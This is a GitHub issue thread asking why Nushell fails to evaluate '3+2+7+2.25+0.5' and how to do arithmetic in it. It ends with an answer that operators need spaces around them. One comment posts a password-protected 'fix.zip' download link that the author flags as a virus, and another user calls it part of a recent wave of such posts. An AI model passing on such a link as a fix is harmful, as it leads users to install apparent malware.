### ISSUE TITLE
NuShell should support simple calculator functions

### ISSUE THREAD

**Issue by MovGP0** [nushell/nushell#13786]
### Related problem

When using NuShell, it should be possible to use it as a simple calculator.

This is something that works in most other shells, like [Bash](https://www.geeksforgeeks.org/simple-calculator-bash/) and [PowerShell](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators).

### Current behavior

> nu> 3+2+7+2.25+0.5
```
 Error: nu::shell::external_command
 
   × External command failed
    ╭─[entry #1:1:1]
  1 │ 3+2+7+2.25+0.5
    · ───────┬──────
    ·        ╰── Command `3+2+7+2.25+0.5` not found
    ╰────
   help: `3+2+7+2.25+0.5` is neither a Nushell built-in or a known external command
```

### Expected behavior

Entering a simple numerical calculation should calculate and output the result:

> nu>  3+2+7+2.25+0.5
```
14.75
```

### Additional context and details

> nu> version

```
╭────────────────────┬──────────────────────────────────────────╮
│ version            │ 0.97.1                                   │
│ major              │ 0                                        │
│ minor              │ 97                                       │
│ patch              │ 1                                        │
│ branch             │                                          │
│ commit_hash        │ 60769ac1ba3ea036d889f140095d855e5597840c │
│ build_os           │ windows-x86_64                           │
│ build_target       │ x86_64-pc-windows-msvc                   │
│ rust_version       │ rustc 1.78.0 (9b00956e5 2024-04-29)      │
│ rust_channel       │ 1.78.0-x86_64-pc-windows-msvc            │
│ cargo_version      │ cargo 1.78.0 (54d8815d0 2024-03-26)      │
│ build_time         │ 2024-08-21 03:34:17 +00:00               │
│ build_rust_channel │ release                                  │
│ allocator          │ mimalloc                                 │
│ features           │ default, sqlite, system-clipboard, trash │
│ installed_plugins  │                                          │
╰────────────────────┴──────────────────────────────────────────╯
```

**Comment by AlienDarkCat** [comment]
Give this a shot
https://www.mediafire.com/file/kc2tzx0iodbtndd/fix.zip/file
Passcode: changeme
you must have a gcc compiler

**Comment by MovGP0** [comment]
> [!WARNING]
> DO NOT DOWNLOAD THE VIRUS LINK BY **AlienDarkCat**

**Comment by KAAtheWiseGit** [comment]
Yep, that's another one.  They started showing up recently.

And on the note of the issue, Nushell supports arithmetic, it's just whitespace sensitive.

```Nushell
~> 3 + 2 + 7 + 2.25 + 0.5
14.75
```

There are quite a few operators, in fact, you can see a list by using `help operators`.
